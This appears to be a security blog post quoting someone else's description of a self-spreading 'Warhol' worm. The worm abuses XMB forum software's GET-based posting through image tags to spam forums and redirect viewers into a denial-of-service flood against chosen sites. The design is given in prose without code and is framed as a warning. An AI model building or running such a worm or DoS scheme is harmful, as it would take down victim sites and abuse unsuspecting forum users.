Our innocent little Warhol worm has begun making it’s rounds. There are some serious additional implications that have not been thought through completely. One thing that unsticky brought to my attention was the use of a Warhol work for spamming. He correctly diagnoses a problem in myyearbook.com but takes it to the next step and describes what it would take to build a Warhol XSS worm.
This is actually a pretty interesting read if you aren’t already familiar with how it would work:
While I was once again wasting my time and life on myyearbook, I found that their forum software, XMB, accepted GET requests to make replies or new threads, which can be forced via an image tag. So I played around with it, and forced some random and useless spam, from unsuspecting users, all the while thinking about how it could truely be exploited. Then it hit me, why not point an image tag to a remote php script, instead of just to the posting script. That way, you can have your script generate new code and forward the viewer to back to the posting script, creating a post containing the code to repost once again. So now I’ve created a forum worm that can do wonders like spam… and advertise. So I started thinking about what else I could do, then once again, an epiphany. What if that technique were coupled with another image tag pointing to a separate php script. This time, the script would redirrect the viewer’s GET request to a large page on a victim site. For every X views the ‘infected’ threads got, the victim page got just the same. On a single forum, this wouldn’t be a problem, really in any sense of the word. But after a quick google search, I found there were over 2 million forums running the same vulnerable forum software. Even with the far under-estimated guess of a total of 10 views for each forum, that’s still a good 20 million requests sent to the victim site in a very short ammount of time, basicly within hours. But, keep in mind this is a worm, and won’t be making just one post, it’ll be making as many posts as it gets views. An exponential increase of requests sent to our victim page. I severly doubt there’s really a single server running that would be able to handle that kind of traffic. Once the origional target goes down, we’re left with dead links in all our posts… or so you’d think. Back to that idea on using a PHP script to dirrect the users. This would allow you to have a list of targets, and cycle through them, as long as your scripts and ‘infected’ threads remained up. Of course, all this raises the problem of getting servers that would be able to handle the traffic generated by both the spreading of the worm, and the requests for the script to divy out the DoS traffic. This could easily be taken care of with a large number of hosted scripts, and checks inside each of them to see which scripts were still up and which weren’t. If a script died, no more posts pointing to it would be made. Sort of scarey to think such a realitively small flaw could be turned into something so much larger and far more destructive. In a sense, an attacker could use this to knock out any sites of his or her choosing, and keep them down…